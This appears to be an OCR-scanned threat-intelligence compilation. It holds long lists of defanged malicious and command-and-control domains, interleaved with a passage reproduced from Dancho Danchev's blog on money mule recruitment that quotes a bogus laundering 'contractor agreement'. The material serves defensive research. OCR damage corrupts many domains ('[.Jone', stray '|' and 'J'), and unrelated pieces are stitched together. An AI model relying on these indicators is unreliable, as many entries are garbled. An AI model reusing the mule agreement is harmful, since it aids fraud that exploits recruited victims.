hxxp://mafaldaflamniabarateiro[.]skin 
hxxp://sidewormpower|[.]pics 
hxxp://ingritnicolaugranjeiro[.]Jicu 
hxxp://Ilvarocarlabelchiorinho[.]yachts 
hxxp://macemourneautumnragepicker[.]icu 
hxxp://pauladenisepereira[. ]beauty 
hxxp://sdtghgbjtyreyjyjtis[.]beauty 
hxxp://sdtghgbjtyreyjyjtis[.]pics 
hxxp://sdtghgbjtyreyjyjtis[.]quest 
hxxp://sdtghgbjtyreyjyjtis[.Jskin 
hxxp://vitriageraldinavilarinho[. ]hair 
hxxp://greyswordblack[. ]hair 
hxxp://halfdarkblackbronze[.]skin 
hxxp://nammerduskseablack[.]yachts 
hxxp://hvhtyjtbyjorvt[.]hair 
hxxp://hvhtyjtbyjorvt[.]homes 
hxxp://hvhtyjtbyjbrvt[.]yachts 
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hxxp://sidjhvksmcasopjdghj[.]quest 
hxxp://ingritnicolaugranjeiro[. ]icu 
hxxp://nogdulg[.Jone 
hxxp://thurintondr[.Jone 
hxxp://zfmatuwcfey[.]top 
hxxp://dumpozor[.lone 
hxxp://ydwwfxeazat[. ]top 
hxxp://xwkdxusiokz[.]buzz 
hxxp://peyel[.]websit 
hxxp://fiuthur[.]pro 
hxxp://agrosaoxe[.]info 
hxxp://rcmmontagens[.]one 
hxxp://rogzo[.]}website 
hxxp://zaocopper[.]sbs 
hxxp://murkreil[.]live 
hxxp://khaveump[. live 
hxxp://grosaoxew|. ]live 
hxxp://hixerod[.]one 
hxxp://turkreiw[.]info 
hxxp://marketingmatinor[.]one 
hxxp://marramonckscloud[.]mom 
hxxp://propagandatorrim[.Jone 
hxxp://publicidadesiniaim[.]one 
hxxp://rhcauamarcossilveira[.Jone 
hxxp://thomasanxu[. ]live 
hxxp://verinomarramoncks[. ]live 
hxxp://rfermande[.]pro 
hxxp://oyaut[.]cyou 
hxxp://aparecidadamatakrika[. ]xyz 
hxxp://arthurcauaaraujozepto[. ]live 
hxxp://analuecarlosassessoriajuridicaltda[. ]lol 
hxxp://asbarbaravidrositdacom[. ]website 
hxxp://barbaravidrosltdacom|[.]website 
hxxp://bernardoenairferragensme[. ]wiki 
hxxp://zeemanueleletronicame[.]icu 
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hxxp://viniciuseauroraadvocaciame[.]xyz 
hxxp://evelynediegobuffetitda[. Jlol 
hxxp://vuorumasproducaol[. ]skin 
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hxxp://ingressosonline[. hair 
hxxp://ingressosonline[.]homes 
hxxp://ingressosonline[.]makeup 
hxxp://ingressosonline[.]mom 
hxxp://ingressosonline[.]pics 
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hxxp://botoxcapilar[.]makeup 


hxxp://botoxlabial[.]makeup 
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hxxp://pluti[.]cyou 
hxxp://fondly[.]cyou 
hxxp://supplysuccess[.]best 
hxxp://venturevision[.]online 


hxxp://allianceadvantage[.]best 
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hxxp://companycornerstone[.]online 
hxxp://consultconsolidation[.]best 
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hxxp://enterpriseedge[.lonline 
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relationship to the Company and of the services hereunder. If the Contractor releases any 
of the above information to any parties outside of this company, such as personal 
friend, close relatives or other Financial Institutions such as a Bank or other Finan- 
cial Firms, it could be grounds for immediate termination. |f the Contractor is ever in 
doubt of what information can be released and when, the Contractor will contact their superior 
right away. 
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TERMS OF ENGAGEMENT 

The Contractor is engaged by the Company on terms of thirty days (30) probationary period. 
During the probationary period the Company undertakes to pay to the Contractor 
the base salary amounting to 2300 USD per month plus 8 % commission from 
each payment processing operation. After the probationary period the Company 
agrees to revise and raise the base salary up to 3000 USD. The Company has the right 
to cancel this Agreement at any time within the probationary period or refuse to extend it 
after that, should the Contractor refuses to fulfill his/her obligations under this Agreement or 
fulfills them not in good faith. The Contractor has the right to terminate the Agreement at any 
time on condition that he/she has processed all previous payments and has no new instructions. 


COMPENSATION: 

The Company undertakes to pay taxes accrued in connection with money transfer. The 
Company shall also reimburse part of expenses which are incurred in connection with money 
transfer by Western Union or MoneyGram systems (should money transfer charges exceed 
3 %, i.e. commission for payment processing operation). The above difference will be auto- 
matically added to the basic salary of the Contractor and paid once per month together with 
the basic salary. All reasonable and approved out-of-pocket expenses which are incurred in 
connection with the performance of the duties hereunder shall be reimbursed by the Company 
during the term of this Agreement, against the bill presented by the Contractor. The Company 
shall have the right to decrease the Contractor’s commission in case the payment processing 
terms were violated by the Contractor. 
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Should the Contractor delays re-sending money accepted to his bank account for the period 
exceeding one (1) day without any explicit reason, the Company shall have the right to 
impose sanctions on the Contractor if only the delay has not been caused by the Force Majeur 
circumstances and to apply to the arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other damage if any, evicted due to the 
delay. The Contractor may take days off at any time and at his/her option upon giving five (5) 
working days advance notice in writing to the Company in order that the latter may abstain 
from charging the Contractor with new instructions. However, salary for each day-off is 
deducted from the Contractor's base salary." 


Sample agreement that each and every potential money mule has to upload through 


the web interface, interestingly, each and every of the bogus brands has a custom made Seal, 
part of the services offered by the managed vendor: 
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hxxp://dicmhssepmsidahcbfhojigipobfsefal[.]top 
hxxp://docpsigpecosugdeurasorsmaafpadsf[. ]top 


hxxp://fpoedoaagbcduashsjiddfrsibufemrs[.]top 


hxxp://gcomdmgojmermhoaobrcdhcfbbcjghhr[. ]top 


hxxp://hsdecprrbdrcufacrerergpagosfreoa[. ]top 
hxxp://jrmcsdjriesibcuuhbgosbpuaebssiae[. ]top 
hxxp://jrursormegcrbrrbocsgsgmchrgbburf[. ]top 
hxxp://cbsoeddprpcsedhidrcegihbreubpoes[.]top 
hxxp://alienatwebbros[.]sbs 
hxxp://doedingwebros[.]sbs 
hxxp://dombrosnatweb[.]sbs 
hxxp://dowbrosnatweb[.]sbs 
hxxp://failwebbros[.]sbs 
hxxp://fowlingwebbros[.]sbs 
hxxp://f5s5duhn4rmisul[. ]fit 

hxxp://ulks33g 7tOudb4[.]eu 
hxxp://xailmm2fpcflbq[.]Jeu 
hxxp://zhblkjk8nbietd[. ]fit 
hxxp://zt5rksfhniwdme|[.]Jeu 

hxxp://Oxi5r2 Lwm89hal[. ]fit 
hxxp://20xx65gn0assye[.]eu 
hxxp://cocck7riewn59q[. ]fit 
hxxp://eOtu0qo5dzfqr5[. ]fit 
hxxp://emda2dka59ksfy[.]eu 


hxxp://koyteo[.]business 


26793 


hxxp://ovkral[.]world 
hxxp://poaklace[.]surf 
hxxp://pubipen[.]shop 
hxxp://quexio[.]us 
hxxp://mercadodaneting[.Jone 
hxxp://dowbroswebneting[.Jone 
hxxp://lembretesdiws[.]one 
hxxp://dowbroneting[. ]fit 
hxxp://avisosnetdows[.]one 
hxxp://avisosnetdows[. ]fit 
hxxp://campoeroca[.]bond 
hxxp://campoeroca[. ]link 
hxxp://cavalgadasweb[.]bond 
hxxp://cavalgadasweb[. ]quest 
hxxp://cavalocrioulo[.]cfd 
hxxp://cavalocrioulof[. ]link 
hxxp://cavalotrote[.]bond 
hxxp://cavalotrote[.]click 
hxxp://giuseaze[. ]business 
hxxp://adantorandir[. ]fashion 
hxxp://baravey[.]pro 
hxxp://dulaworish[.]host 
hxxp://maowetil[.]world 
hxxp://meyzmecu[.]us 
hxxp://omdyo[. ]business 
hxxp://pakotae[.]shop 
hxxp://bvcderuik[.]one 
hxxp://cxvdsfwejmy[.]one 
hxxp://mncbvdisf[.Jone 
hxxp://cvcxsdfrew[.]one 
hxxp://cfredswjkc[.]one 
hxxp://dswecxbgt[.]one 
hxxp://gbfdxcvasd[.Jone 
hxxp://asdferthjfgk[.]one 
hxxp://facegatoresnetf[.]sbs 
26794 


hxxp://facegatoresnetg[.]sbs 
hxxp://facegatoresneth[.]sbs 
hxxp://facegatoresnetil[.]sbs 
hxxp://flowlingbarester[.]sbs 
hxxp://Ikiujnyttrfdg[.Jone 
hxxp://muyhtgrfed[.lone 
hxxp://motohondaf[. ]biz 
hxxp://salgueirao[.]click 
hxxp://soquerouma[.]biz 
hxxp://todaquengarquer[.]biz 
hxxp://torneadoral.]click 
hxxp://facegatoresnetal[.]sbs 
hxxp://facegatoresnetb[.]sbs 
hxxp://hipi[.]com[.]br 
hxxp://hipyfitness[.]com[.]br 


hxxp://drogariasredeforte[.]com[.]br 


hxxp://ayqytyrxbrfil.]fit 
hxxp://qpzgycqagykg[. surf 
hxxp://roonblwracbZ[. ]fit 
hxxp://udcwwifmzesy|. ]fit 
hxxp://utshqlpwkkan[. Jeu 
hxxp://wswyznfiyigl[.]eu 
hxxp://zcyzcwglozsy[.]fit 
hxxp://gjyniitkxqyj[.]surf 
hxxp://lprxarkaujzy[.]Jeu 
hxxp://omdtmdaytjuu[.]surf 
hxxp://pjkkxkgrfzaw[.]surf 
hxxp://pogjyceaiaxz[.]surf 
hxxp://jobcomesterd18[.]buzz 
hxxp://jobcomesterd19[.]buzz 
hxxp://jobcomesterd20[.]buzz 
hxxp://jobcomesterd11[.]buzz 
hxxp://jobcomesterd12[.]buzz 
hxxp://jobcomesterd13[.]buzz 
hxxp://jobcomesterd14[.]buzz 


26795 


hxxp://jobcomesterd15[.]buzz 
hxxp://jobcomesterd16[. ]buzz 
hxxp://jobcomesterd17[.]buzz 
hxxp://flowersstc[. ]buzz 
hxxp://ogdebaucsjjeghfheesajgeumbjhsbdu[. ]top 
hxxp://failandstor[.]buzz 
hxxp://agentewer[.]buzz 
hxxp://agentmax[.]buzz 
hxxp://alcantaralinf[. buzz 
hxxp://animemax[. ]ouzz 
hxxp://doningstore[. ]buzz 
hxxp://estarwebs[. ]buzz 
hxxp://thourxo[.]fashion 
hxxp://unnebor[.]pro 
hxxp://yekobyioxnab[.]eu 
hxxp://biwtblfbwv[.]casa 
hxxp://ifswbaxmkol[.]cloud 
hxxp://Ixxbrmwgbkk[.]top 
hxxp://myeldrqgjsdb[. life 
hxxp://qgxabnszrdns[.]surf 
hxxp://rzdywixixzy[.]cloud 
hxxp://uerutxrsqil[.]top 
hxxp://urgjnixhzf[.Jeu 
hxxp://wozwobchitpr[. ]top 
hxxp://bpwocsltfdpI. ]life 
hxxp://chtopfjbunehp[.]surf 
hxxp://dgzjwkjgis[.]cloud 
hxxp://dnnilppfegloh[. ]life 
hxxp://ertkzmrlagrex{[. ]surf 
hxxp://fgzqudjpoicgu[.]top 
hxxp://frhoklqhapep[.]cloud 
hxxp://gdmosrurjpwtf[.]Jeu 
hxxp://vistyhgjrezxcx[.]download 
hxxp://xertsontriscler[.]agency 
hxxp://frizfftylerdssal[.]Jart 
26796 


hxxp://ghftrezbreskler[.]Jart 
hxxp://ghtestrester[. ]life 
hxxp://nhfresterttt[.]casa 
hxxp://seztrehjplk[.]Jin 
hxxp://coterdesterbutom[.]date 
hxxp://coterdesterbuton][. ]bid 
hxxp://festertyhuilp[.]download 
hxxp://frestyernhtk[.]surf 
hxxp://valohad[.]surf 
hxxp://leteaxe[.]world 
hxxp://xopiudjmnbcgd[.]makeup 
hxxp://ytyrxcvuiorwe[.]cyou 
hxxp://ytyrxcvuiorwe[.]makeup 
hxxp://zopuaytsfrscxsz[.]cyou 
hxxp://zopuaytsfrscxsz[.]Jmakeup 


hxxp://aqacdxsedwujy[.]makeup 


hxxp://asdnshdvfxbcndkdfmnmmkdfgtrv[.]cyou 
hxxp://asdnshdvfxbcndkdfmnmmkdfgtrv[. ]makeup 
hxxp://ofunhdsejrwygfjwdhyerdgrtygrht[.]cyou 
hxxp://ofunhdsejrwygfjwdhyerdgrtygrht[.]makeup 


Related loCs and C &C server domains include: 


hxxp://ddireitodesejard[.]us 
hxxp://financialbom[.]us 
hxxp://escriturario[.]us 
hxxp://masteroso[.]us 
hxxp://segundojornall[.]Jus 
hxxp://ojornalforam[.]us 
hxxp://carentecaridoso[.]us 
hxxp://unicodemais|[.]us 
hxxp://bemcomportadobemeducado[.]us 
hxxp://majestoso[.]us 
hxxp://valorosotop[.]us 
hxxp://planejamentofinanceiro[.]us 
hxxp://legitimosim[.]us 


hxxp://negociosnet[.]us 


26797 


hxxp://cabodenote[.]us 
hxxp://destedomingo[.]us 
hxxp://zelosos[.]us 
hxxp://sensivelsentimentall.]us 
hxxp://sincerosingular[.]us 
hxxp://zangados[.]us 
hxxp://diretosdewashington[.]us 
hxxp://zelador[.]us 
hxxp://lucidolutador[.]us 
hxxp://legitimoseletrados[.]us 
hxxp://notavell[.]us 
hxxp://rroantochel[.]us 
hxxp://kantianoskantistas[.]us 
hxxp://decrescimento[.]us 
hxxp://birrentobisbilhoteiro[.]Jus 
hxxp://vulgares[.]us 
hxxp://paracrisede[.]us 
hxxp://zoados[.]us 
hxxp://umexoficialdamarinhal[.]us 
hxxp://desapontarosicms[.]us 
hxxp://depolitico[.]us 
hxxp://quecostuma[.]us 
hxxp://temexercido[.]us 
hxxp://debitcoinnestal[.]us 
hxxp://obotafogose[.]us 
hxxp://decenteasseclal[.]us 
hxxp://derrotouovasco[.]us 
hxxp://toroerisonesufoco[.]us 
hxxp://dentrodosdetalhes[.]us 
hxxp://decondicoes[.]us 
hxxp://oinvestimento[.]us 
hxxp://comosvilaos[.]us 
hxxp://ecadavezmais|[.]us 
hxxp://altashistoricas[.]us 
hxxp://americanothenewyork[.]us 
26798 


hxxp://serelepesereno[.]us 
hxxp://omaterialjornalistico[.]us 
hxxp://umprojeto[.]us 
hxxp://conformeastarifas[.]us 
hxxp://alegreagressivo[.]us 
hxxp://forampresosem[.]us 
hxxp://kepleriano[.]us 
hxxp://tvcomumso[.]us 
hxxp://feitopelo[.]us 
hxxp://plutoturbos[.]Jus 
hxxp://deveatingir[.]us 
hxxp://fundoimobiliario[.Jus 
hxxp://sobreaenergia[.]us 
hxxp://oespiaoeaesposa[.]us 
hxxp://documentados[.]us 
hxxp://ninghg[.Jus 
hxxp://dossubmarinos[.]us 
hxxp://maiorespatamares[.]us 
hxxp://manndrytwigar[.]us 
hxxp://sabemosque[.]us 
hxxp://abuletangles[.]us 
hxxp://scotilhaacal.]us 
hxxp://laroesso[.]us 
hxxp://eleiraatins[.]Jus 
hxxp://eninospinho[.]us 
hxxp://assuasgarras[.]us 
hxxp://foiaprovado[.]us 
hxxp://domercado[.]us 
hxxp://atingindoos[.]us 
hxxp://documentossobre[.]us 
hxxp://omundoemalertal.]us 
hxxp://windsurfistas[.]us 
hxxp://precisoestar[.]us 
hxxp://wardceojobeo[.]us 


hxxp://comgoldeell[.]us 


26799 


hxxp://decombustiveis[.]us 
hxxp://prioridades[.]us 
hxxp://atecnologianuclear[.]us 
hxxp://parao[.]us 
hxxp://arroganteapressado[.]us 
hxxp://seriosimpatico[.]us 
hxxp://patamar[.]us 
hxxp://atraenteatrevido[.]us 
hxxp://desgaste[.]us 
hxxp://recuperounocampeonato[.]us 
hxxp://ambiciosoamarguradol[. Jus 
hxxp://conhecerfrases[.]us 
hxxp://rahisenferthwerd[.]us 
hxxp://virtualteajuda[.]Jus 
hxxp://durantetodo[.]us 
hxxp://comandodevoz[.]us 
hxxp://extremamentecaras|[.]us 
hxxp://noradargloball[.]us 
hxxp://produtosdarecord[.]us 
hxxp://cacetaregregias[.]us 
hxxp://quedanaatividade[.]us 
hxxp://precedidodeumal. Jus 
hxxp://eletricasao[.]us 
hxxp://bombombastico[.]us 
hxxp://nobrasilopais[.]Jus 
hxxp://naoeramrivais[.]us 
hxxp://werdtoan[.]us 
hxxp://leiadocs[.]us 
hxxp://dependesmaleitas[.]us 
hxxp://inflacaonos[.]us 
hxxp://dizmidia[.]us 
hxxp://atingemaior[.]us 
hxxp://anunciouaapreensao[.]us 
hxxp://dopreco[.]us 
hxxp://amadoaltruista[.]us 
26800 


hxxp://saibacomoaassistente[.]us 
hxxp://empresariale[.]us 
hxxp://seujornalismo[.]us 
hxxp://emetenteebado[.]us 
hxxp://sensacionalsensato[.]us 
hxxp://porcausa[.]us 
hxxp://assertivoatencioso[.]us 
hxxp://xardosone[.]us 
hxxp://semprecapacitado[.]us 
hxxp://coisasvibrantes[.]us 
hxxp://ubesenal.]us 
hxxp://inflacionarias[.]us 
hxxp://cassenteinfernoc[.]us 
hxxp://bcopeirodefecar[.]Jus 
hxxp://agentealvejara[.Jus 
hxxp://fmadeixaespessof[.]us 
hxxp://earsenaldaremose[.]us 
hxxp://pressao[.]us 
hxxp://plutofortunax[.]us 
hxxp://largoleal[.]us 
hxxp://justiceirojusto[.]us 
hxxp://ledolegall[.]us 
hxxp://kardecistakepleriano[.]us 
hxxp://loucolouvavell[.]Jus 
hxxp://levesliberais[.]us 
hxxp://licitolider[.]us 
hxxp://luxuososlivres[.]us 
hxxp://xabouqueiro[.]us 
hxxp://amiones[.]us 
hxxp://ethelealrah[.]Jus 
hxxp://ceoanwineo[.]us 
hxxp://useing[.]us 
hxxp://usedroneschool[.]us 
hxxp://porissobasta[.]us 


hxxp://neschoolapp[.]us 


26801 


hxxp://rning[.Jus 
hxxp://preguicosoprepotente[.]us 
hxxp://pacatopaciente[.]us 
hxxp://perseverantepersistente[.]us 
hxxp://perspicazespessimistas[.]us 
hxxp://perfeccionistaperfeito[.]us 
hxxp://preocupadopreparado[.]us 
hxxp://presuncosoprestativo[.]us 
hxxp://prevenidoprimoroso[.]us 
hxxp://prosperoprotetor[.]us 
hxxp://problematicoprodutivo[.]us 
hxxp://piedosospioneiros[.]us 
hxxp://passivopequeno[.]us 
hxxp://mitcargifuchris[.]us 
hxxp://sempreativo[.]us 
hxxp://ajaxtime[.]Jus 
hxxp://bemhumoradobemintencionado[.]us 
hxxp://livrelindo[.]us 
hxxp://trylearning[.Jus 
hxxp://demaquinasdemineracao[.]us 
hxxp://saoluismal[.]us 
hxxp://nocastelaoem[.]us 
hxxp://osegundotempo[.]us 
hxxp://weberiano[.]us 
hxxp://thezens[.]us 
hxxp://compontoso[.]us 
hxxp://rahrodrytjohn[.Jus 
hxxp://desdecolocal.]us 
hxxp://inflacaomostra[.]us 
hxxp://baldarisencome[.]us 
hxxp://constantede[.]us 
hxxp://outubrosegundo[.]us 
hxxp://naqualidade[.]us 
hxxp://brandsonthasha[.]us 
hxxp://emissaodecotas[.]us 
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hxxp://isensanmitmond[. ]us 
hxxp://naoeolocall[.]us 
hxxp://tercafeirasob[.]us 
hxxp://fornecimento[.]us 
hxxp://avorazes[.]us 
hxxp://pornanoite[.]us 
hxxp://tiveremouteiro[.]us 
hxxp://paraaproveitar[.]us 
hxxp://schoolpe[.]us 
hxxp://acusacaodefurto[.]us 
hxxp://almejamfuleiras[.]us 
hxxp://deenergiaalem[.]us 
hxxp://fomentasmacerar[.]us 
hxxp://aalta[.Jus 
hxxp://meninovingativo[.]us 
hxxp://oprocessode[.]us 
hxxp://hereisumrob[.]us 
hxxp://apenasnobrasil[.]us 
hxxp://anualdeveser[.]us 
hxxp://altadejuros[.Jus 


hxxp://asestrategias[.]us 


Related loCs and C &C server domains: 


hxxp://roverdoneover[.]us 


hxxp://traducoesdedocumentos[.]us 


hxxp://topostay[.]us 
hxxp://thecriminalmind[.]us 
hxxp://thegreenfund[.]us 
hxxp://welcomecorp[.]us 
hxxp://visiontrans[.]us 
hxxp://williamscleaning[.]us 
hxxp://muchmoremoneyl.]us 
hxxp://newsbridge[.]us 
hxxp://myopinionmatters[.]us 
hxxp://portlandfrredum[.]us 


hxxp://pointman[.]us 


26803 


hxxp://raingardens[.]Jus 
hxxp://northwestvegfest[.]us 
hxxp://psychicconnection[.]us 
hxxp://densutefit[.]us 
hxxp://mypersonalwebcams|[.]us 
hxxp://mustevents[.]us 
hxxp://rebellebeauty[.]us 
hxxp://neworleansescort[.]us 
hxxp://teamhilton[.]us 
hxxp://pearlclo[.]us 
hxxp://seniorresources[.]us 
hxxp://politicu[.Jus 
hxxp://wordfm[.]Jus 
hxxp://ouronline[.]us 
hxxp://technologyecho[.]us 
hxxp://nathalagueral[.]us 
hxxp://stimulusupdate[.]us 
hxxp://traducaodedocumentos[. Jus 
hxxp://trimed[.Jus 
hxxp://pkassit[.]us 
hxxp://valuegranite[.]us 
hxxp://safestepshowers[.]us 
hxxp://propersun[.]Jus 
hxxp://vignati[.]us 
hxxp://testwhether[.]us 
hxxp://waterandfiredamagerestoration[.]us 
hxxp://superfoodworld[.]us 
hxxp://texasturf[.]us 
hxxp://sunsetinnsuitesseward[.]us 
hxxp://theappcollective[.]us 
hxxp://shopxclusivel[.]us 
hxxp://szresearch[.]us 
hxxp://uselu[.]Jus 
hxxp://scrapfriends[.]us 
hxxp://ruxtnation[.]us 

26804 


hxxp://sustainablechoices[.]us 
hxxp://thepcl[.]us 
hxxp://thefishguy[.]us 
hxxp://magazinesop[.]us 
hxxp://lickingountyohio[.]us 
hxxp://transcendentalfilmstudios[.]us 
hxxp://fortve[.]us 
hxxp://cypherock[.]us 
hxxp://duvetica[.]us 
hxxp://gassingamerica[.]us 
hxxp://drdentall[.Jus 
hxxp://crstalmavensitd[.]us 
hxxp://bpstech[.]us 
hxxp://flightbookingexpert[. ]us 
hxxp://brendansmith[.]us 
hxxp://collegeathleterecruiting[.]us 
hxxp://frontlinerestoration[.]us 
hxxp://fenesse[.]us 
hxxp://finesss[.]us 
hxxp://healththefxforms[.]us 
hxxp://balloonexpress[.]us 
hxxp://adebeatz[.]us 
hxxp://kingstreeranch[.]us 
hxxp://barcley[.]us 
hxxp://bigpawslargebreedrescue[.]us 
hxxp://inkdesign[.]us 
hxxp://bcarroll[.Jus 
hxxp://apassist[.]us 
hxxp://ambassadorbuilders[.]us 
hxxp://justtryingtosurvive[.]us 
hxxp://biani[.]us 
hxxp://hokashopsl[. Jus 
hxxp://michealsons[.]us 
hxxp://mesastamps[.]us 


hxxp://mardigrasapperall.]Jus 


26805 


hxxp://lovefinder[.]us 
hxxp://lionspath[.]Jus 
hxxp://magicmatters[.]us 
hxxp://allnationscommunitychurch[.]Jus 
hxxp://amprowide[.]us 
hxxp://andesflowers[.]us 
hxxp://cyberspark[.]us 
hxxp://cinqueterre[.]us 
hxxp://clouddriven[.]us 
hxxp://bowtietransportation[.]us 
hxxp://brimbleclothing[.Jus 
hxxp://dewaldroofing[.]us 
hxxp://assetscast[.]us 
hxxp://cucinaventimountainview[.]us 
hxxp://certirsa[.Jus 
hxxp://graphictwear[.]us 
hxxp://evergreenbaptist[.]us 
hxxp://iatlantic[.]us 
hxxp://divineappointments[.]us 
hxxp://flightoftheeagle[.]us 
hxxp://investax[.]us 
hxxp://dulastrade[.]Jus 
hxxp://floridasupport[.]us 
hxxp://dirtypictures[.]us 
hxxp://digitalartmasters[.]us 
hxxp://esandx[.]us 
hxxp://forslink[.]us 
hxxp://homemailers[.]us 
hxxp://fgroundrpowergenrator[.]us 
hxxp://hivelife[.]us 
hxxp://laststock[.]us 
hxxp://letterperfectinc[.]us 
hxxp://marinecuisine[.]us 
hxxp://loveheartnowl[.]us 


hxxp://meatsandwich[.]us 
26806 


hxxp://lovingu[.]Jus 
hxxp://makethewebwork[.]us 
hxxp://lousyfers[.]us 
hxxp://maldivesembassy[.]us 
hxxp://usremedyanchor[.]us 
hxxp://afriquejmarbitrage[.]us 
hxxp://assetprotect[.]us 
hxxp://aspireit[.]us 
hxxp://atvgames[.]us 
hxxp://americastatenationals[.]us 
hxxp://herocmetics[.]us 
hxxp://loteriade[.]us 
hxxp://decksbetter[.]us 
hxxp://blingdings[.]us 
hxxp://movingsigns[.]us 
hxxp://kingjordan[.]us 
hxxp://curlcare[.Jus 
hxxp://brevrdclerk[.Jus 
hxxp://passisp[.]us 
hxxp://millenniumhealthzoom[.]us 
hxxp://petslvs[.]Jus 
hxxp://trendingfilms[.]Jus 
hxxp://bylobster[.]us 
hxxp://socialexchanger[.]us 
hxxp://brandedboards[.]us 
hxxp://passise[.]us 
hxxp://stellaniagaral[.]us 
hxxp://laserturntable[.]Jus 
hxxp://verdansk[.]us 
hxxp://annoor[.]us 
hxxp://fishercustomerservicel[.]us 
hxxp://directinteriors[.]Jus 
hxxp://usfamilywatchdog[.]us 
hxxp://pswad[.]us 
hxxp://elemetaldesign[.]us 


26807 


hxxp://cccount[.]us 
hxxp://flowerstog[.]us 
hxxp://crimsonsun[.]us 
hxxp://discounthdtv[.]us 
hxxp://greenvommunications[.]us 
hxxp://ajourlingerie[.]us 
hxxp://customersupportnumber[.]us 
hxxp://genuineuatoparts[.]us 
hxxp://doglicenss[.]us 
hxxp://plumberguyinsuranc[.]us 
hxxp://moomooleatherworks[.]us 
hxxp://joeshandymanservice[.]us 
hxxp://flightcrewtraining[.]us 
hxxp://fediet[.Jus 
hxxp://runarealbiz[.]us 
hxxp://truckconsoll[.]us 
hxxp://bbcicecream[.]us 
hxxp://wilcome[.]us 
hxxp://actury[.]us 
hxxp://thecolouredsection[.]us 
hxxp://neptuneretailsolutionszoom[.]us 
hxxp://toptipsoffice[.]us 
hxxp://unitedindustries[.]us 
hxxp://moranatias[.]us 
hxxp://systemwireless[.]us 
hxxp://resianger[.]us 
hxxp://lastbof[.]us 
hxxp://modelamerical[.]us 
hxxp://humphreysmarket[.]Jus 
hxxp://mailitnmore[.]us 
hxxp://abreakingnews[.]us 
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EXHIBIT A 


TRANSFER SERVICE. Term of the Agreement snl Compunaution 


CONFIDENTIALITY 


TERMS OF ENCACEKMENT 


COMPENSATION 


With such a professional attitude towards their work, now a process that’s easily outsourced to 
vendors specializing in quality design and bogus company creation services, their recruitment 
process is prone to reach new levels of efficiency, which is why standardization was applied 
at the first place. However, just like in the case of malware and scareware, template-ization 
undermines their operational security (OPSEC) a process which they’re clearly aware, but do 
not fully utilize since money mule recruitment is currently in efficiency-mode. 


Knowing the transactions pattern for a money mule recruitment, one which is clearly 
visible while going through their agreements, can in fact make it easier for financial institu- 
tions to protect their customers from themselves before it gets too late and they unknowingly 
dive deep into the money mule recruitment business model. 


Related posts: 

[41]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[42]Money Mules Syndicate Actively Recruiting Since 2002 
[43]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [44]Dancho Danchev'’s blog. 


ttp://voices.washingtonpost.com/securityfix/2009/09/money_mule_recruitment_101.html 


. http: //www.bobbear.co.uk/scope-group-inc.htm1?6a00c340 


http://1.bp.blogspot .com/_wICHhTiQmrA/ShwQq_kTe61/AAAAAAAADoo/IXsylpK2QKM/s1600-h/af-group-1l1c. png 
ttp://ddanchev. blogspot .com/2009/05/inside-money- laundering- groups- spamming. htm 


. http: //ddanchev.blogspot .com/2009/06/dating-spam- campaign-promotes- bogus. html 


http: //ddanchev.blogspot.com/2008/07/template-ization-of-malware-serving.html 


. http://ddanchev. blogspot .com/2009/02/template-ization-of-malware-serving.html 
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hxxp://outsourcenow|.]us 
hxxp://clevelandrealtor[.]us 
hxxp://emiliegermain[.]us 
hxxp://pacersintl[.]us 
hxxp://digitalhomeshow[.]us 
hxxp://silversparrow[.]us 
hxxp://gastoniacap[.]us 
hxxp://sendbackto[.]us 
hxxp://rammamericanfreight[.]us 
hxxp://desishop[.]us 
hxxp://practiceclub[.]Jus 
hxxp://baileyunser[.]us 
hxxp://diglicense[.]us 
hxxp://abnormalisingalkaliseanthropology[.]us 
hxxp://thenaturalsapphirecompany[.]us 
hxxp://quekorcommence[.]us 
hxxp://cumeddicine[.]us 
hxxp://dunawayconstruction[.]us 
hxxp://illvideopodcast[.]Jus 
hxxp://streameastlive[.]us 


hxxp://comfortableworkboot[.]us 
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hxxp://gqgames[.]us 
hxxp://hidagocounty[.]us 
hxxp://therumormill[.Jus 
hxxp://combatmagazine[.]us 
hxxp://cozyless[.]us 
hxxp://militarywireless[.]us 
hxxp://cuttingedgeonlin[.Jus 
hxxp://nmshop[.]Jus 
hxxp://stockxonline[.Jus 
hxxp://tangibleresultstraininggroup[.]us 
hxxp://pegasusrealty[.]us 
hxxp://santactuzcounty[.]us 
hxxp://thermomask[.]us 
hxxp://plamobil[.]us 
hxxp://windsorumc[.]us 
hxxp://survivalgames[.]us 
hxxp://getyouhired[.]us 
hxxp://carmelcrew[.]us 
hxxp://sterlingtitle[.]us 
hxxp://videobabymonitors[.]us 
hxxp://candlefundraiser[.]us 
hxxp://hopeco[.]us 
hxxp://nevadarecretion[.]us 
hxxp://steprelax[.]us 
hxxp://dangardoctor[.]us 
hxxp://spaingolf[.Jus 
hxxp://churchlegacyministries[.]us 
hxxp://wellstation[.]us 
hxxp://custominteriordesign[.]us 
hxxp://confidebrand[.]us 
hxxp://dollhousw[.]us 
hxxp://targetinternatiionall[.]us 
hxxp://plantexusa[.]us 
hxxp://demofound[.]us 
hxxp://webstercountyky[.]us 
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hxxp://riderkeep[.]us 
hxxp://baree[.Jus 
hxxp://pihshop[.]us 
hxxp://samandkristen[.]us 
hxxp://ialitus[.]us 
hxxp://sibgcustomercollections[.]us 
hxxp://zentaistore[.]us 
hxxp://petsavers[.]us 
hxxp://osconstruction[.]us 
hxxp://diabprotocoldiseceies[.]us 
hxxp://ullies[.]us 
hxxp://customerdeall.Jus 


hxxp://financemark[.]us 


hxxp://wonderwomanfullmovieonline[.]us 


hxxp://czechcasting[.]us 
hxxp://eastapply[.Jus 
hxxp://rafaelortiz[.]us 
hxxp://laughingcoyote[.]us 
hxxp://displayart[.]us 
hxxp://martintech[.Jus 
hxxp://parkdentalcare[.]us 
hxxp://deminil[.]us 
hxxp://orderviagral[.]us 
hxxp://connectlivelocals[.]Jus 
hxxp://chargerquall[.]us 
hxxp://clevelandinsider[.]us 
hxxp://wmar[.]us 
hxxp://lifenetwor[.]us 
hxxp://ainder[.]us 
hxxp://dealerdigital[.Jus 
hxxp://silverfiresafety[.]us 
hxxp://telephon[.]us 
hxxp://coveramerical[.]us 
hxxp://attemptings[.]us 


hxxp://therealboujeebundless[.]us 
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hxxp://shopprettyonpurpose[.]us 
hxxp://anthonlewnthonwallwor[.]us 
hxxp://greenbloom[.]us 
hxxp://coldsolution[.]us 
hxxp://usercf[.Jus 
hxxp://uspswxd[.]us 
hxxp://wisdomconstruction[.]us 
hxxp://wisconsinhousingalliance[.]us 
